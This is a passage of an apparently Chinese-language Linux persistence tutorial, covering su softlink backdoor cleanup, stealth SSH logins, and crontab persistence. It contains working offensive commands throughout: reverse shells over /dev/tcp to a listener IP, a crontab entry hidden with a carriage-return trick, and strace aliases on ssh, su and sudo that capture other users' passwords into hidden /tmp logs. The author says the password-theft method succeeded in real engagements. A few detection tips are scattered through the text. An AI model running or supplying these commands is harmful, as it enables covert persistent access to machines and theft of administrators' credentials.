第二步：确定软链接后门文件

查看所有的su文件，以及查找具体哪一个su是软链接后门

cd ~
cd ..
find . -name su

使用ll命令来确定哪一个是后门：

[root@linux-centos /]# ll ./etc/selinux/targeted/active/modules/100/su
总用量 20
-rw-r--r--. 1 root root 1837 9月  13 2017 cil
-rw-r--r--. 1 root root 9171 9月  13 2017 hll
-rw-r--r--. 1 root root    2 9月  13 2017 lang_ext
[root@linux-centos /]# ll ./tmp/su
lrwxrwxrwx. 1 root root 14 12月  6 16:44 ./tmp/su -> /usr/sbin/sshd
[root@linux-centos /]# ll ./usr/share/locale/su
总用量 0
drwxr-xr-x. 2 root root 6 11月  5 2016 LC_MESSAGES
[root@linux-centos /]# ll ./usr/share/bash-completion/completions/su
-rw-r--r--. 1 root root 864 8月   4 2017 ./usr/share/bash-completion/completions/su
[root@linux-centos /]#

最后发现./tmp/su文件是软连接的后门。

第三步：删除软链接后门

一定要记得kill的是两个进程：

rm -rf /tmp/su
kill -9 17650
kill -9 17638

此时连接退出：

此时再也无法连接：

注意事项

切记：不要用 rm -rf /tmp/su/，如果后面多一个斜杠，就会把文件删除！

一定要删除两个进程，如果只删除了正在登录的进程是无效的

2.3 隐身登录（有条件）

如果在已知用户密码的情况下，可以使用这种方法进行登录，如果是自己建立的账号登录的话，一样会被发现。

# 不被last\who\w等指令检测
ssh -T username@x.x.x.x /bin/bash -i
# 不记录ssh公钥在本地.ssh目录中
ssh -o UserKnownHostFile=/dev/null -T user@x.x.x.x /bin/bash -if

如果已知密码的情况下可以使用这个方法登录，比如使用攻击机去登录靶机：

ssh -T bolean@10.50.0.16 /bin/bash -i

但是使用端口检查的话，还是可以看到的：

netstat -anpt

2.4 crontab定时任务

基本上普通crontab一眼就能看出来，基本就是送死的：

crontab -l

如果想进行计划任务的话，可以使用计划任务进行反弹。

2.4.1 bash命令进行反弹

/bin/bash -c 'exec bash -i &>/dev/tcp/10.30.3.49/888 <&1'

但是这个命令如果用到任务计划里面就是：

* * * * * /bin/bash -c 'exec bash -i &>/dev/tcp/10.30.3.49/8688 <&1'

将命令放入到任务计划里面去，然后很快就会回弹一个shell回来：

在这里使用crontab -l了的命令是能看到此时的任务计划的，此时已经收到了shell：

2.4.2 文件反弹

先建立一个sh文件，并对该文件赋予可执行权限：

bash脚本：hello.sh，将文件放在/tmp 目录下面：

#!/bin/bash
bash -i >& /dev/tcp/10.30.3.49/12345  0>&1
#!/bin/bash
bash -i >& /dev/tcp/12x.xxx.xx3.xx3/12345  0>&1

至于留后门的方法可以使用下面的语句，参考：

https://cloud.tencent.com/developer/article/1683265

(crontab -l;printf "*/1 * * * * /tmp/hello.sh;\rno crontab for `whoami`%100c\n")|crontab -

在这里试下：(用了公网的机器)

不久之后，会话就弹回来了：

此时使用crontab -l是看不到当前有新的计划任务的：

但是crontab -e是可以看到的：

但是这个通讯依旧可以看到：

2.5 strace后门-偷其他ssh的密码

参考文档：

https://zhuanlan.zhihu.com/p/355743801

可以通过alias命令来执行特定的命令时静默运行其他程序，从而达到启动后门，记录键值等作用。

这里主要是记录该用户的键盘操作，并无法记录登录靶机的ssh密码信息。

2.5.1 记录ssh的操作。

通过命令替换动态跟踪系统调用和数据，可以用来记录用户ssh、su、sudo的操作。

cp /etc/bashrc /etc/.bashrc.bak  # 将文件备份
vim /etc/bashrc # 编辑文件
alias ssh='strace -o /tmp/.ssh.log -e read,write,connect -s 2048 ssh' 
b
source ~/.bashrc

此时利用该账号再去登录其他账号的时候，发生报错：

此时发生报错，所以在使用该命令的时候一定要注意下是否有strace命令。

当前环境是centos，所以在这里需要自行安装strace：

yum install strace

此时再利用该机器进行登录操作：

登录成功，再看下是否有log文件进行记录：

文件已经存在，但是其中的信息过多，需要进行过滤：

grep -A 9 'password' .ssh.log

将其中的信息进行拼接即为密码信息。

2.5.2 排查技巧

利用alias进行排查：

2.5.3 利用总结

如果需要记录sudo操作、ssh等操作，而且生成的日志可能会出现覆盖的情况，因此对于这种问题，我们对方法进行一个总结：

# 1. 文件备份：
cp /etc/bashrc /etc/.bashrc
# 2. 编辑bashrc文件
vim /etc/bashrc
# 3. 记录本机登录其他机器的ssh信息，在bashrc的末尾/其中，加上下面的句子，会将文件放到/usr/bin/目录下，文件结尾为log
alias ssh='strace -f -e trace=read,write -o /tmp/.ssh-`date '+%d%h%m%s'`.log -s 2048 ssh'
# 4. 记录sudo命令
alias sudo='strace -f -e trace=read,write -o /tmp/.sudo-`date '+%d%h%m%s'`.log -s 2048 sudo' 
# 5. 记录su命令
alias su='strace -f -e trace=read,write -o /tmp/.su-`date '+%d%h%m%s'`.log -s 2048 su'
# source下.bashrc文件
source /root/.bashrc

注意文件不要放在其他的高权限文件夹下，否则生成文件的时候会提示权限不足：

在这里先删除以前的记录，将以上记录插入：

alias ssh='strace -f -e trace=read,write -o /tmp/.ssh-`date '+%d%h%m%s'`.log -s 2048 ssh'
alias sudo='strace -f -e trace=read,write -o /tmp/.sudo-`date '+%d%h%m%s'`.log -s 2048 sudo' 
alias su='strace -f -e trace=read,write -o /tmp/.su-`date '+%d%h%m%s'`.log -s 2048 su'

然后再source一下：

在靶机上登录其他的机器，执行su、sudo命令试试：

此时去找下文件：

使用命令来看下文件，登录的ssh：

grep -A 9 'password' .ssh-0712月121670384140.log

su的命令：

cat .su-0712月121670384157.log | grep write

在这里sudo命令有问题，好像不太好用。

2.4.4 利用总结

主要是偷在机器上管理员的一些操作，有时候能够偷到管理员密码信息
1. 查看是否strace命令，如果没有的话，安装：
centos：yum install strace -y
Ubuntu：apt install strace -y
2. 文件备份：
cp /etc/bashrc /etc/.bashrc
3. 编辑bashrc文件
vim /etc/bashrc 或者是vi /etc/bashrc
# 3. 记录本机登录其他机器的ssh信息，在bashrc的末尾/其中，加上下面的句子，会将文件放到/usr/bin/目录下，文件结尾为log
alias ssh='strace -f -e trace=read,write -o /tmp/.ssh-`date '+%d%h%m%s'`.log -s 2048 ssh'
# 4. 记录sudo命令（根据场景，一般如果是都只有root用户的话，这个命令不建议用，自己测试centos发生报错）
alias sudo='strace -f -e trace=read,write -o /tmp/.sudo-`date '+%d%h%m%s'`.log -s 2048 sudo' 
# 5. 记录su命令（根据场景，一般如果是都只有root用户的话，这个命令不建议用）
alias su='strace -f -e trace=read,write -o /tmp/.su-`date '+%d%h%m%s'`.log -s 2048 su'

2.6 窃取运维的密码

参考：https://zhuanlan.zhihu.com/p/146024506这个在实战中，成功过。

3.总结

本文仅对linux的权限维持做了非常微小的学习，文章所有的操作都是网上已有的技术，仅供参考，如有错误，欢迎指正。

4.参考资料

其中还有一部分参考的文章链接在文中。

https://www.v4ler1an.com/2020/12/backdoor/
https://zhuanlan.kanxue.com/article-16246.htm
https://cloud.tencent.com/developer/article/1683265

Linux权限维持入门学习（下）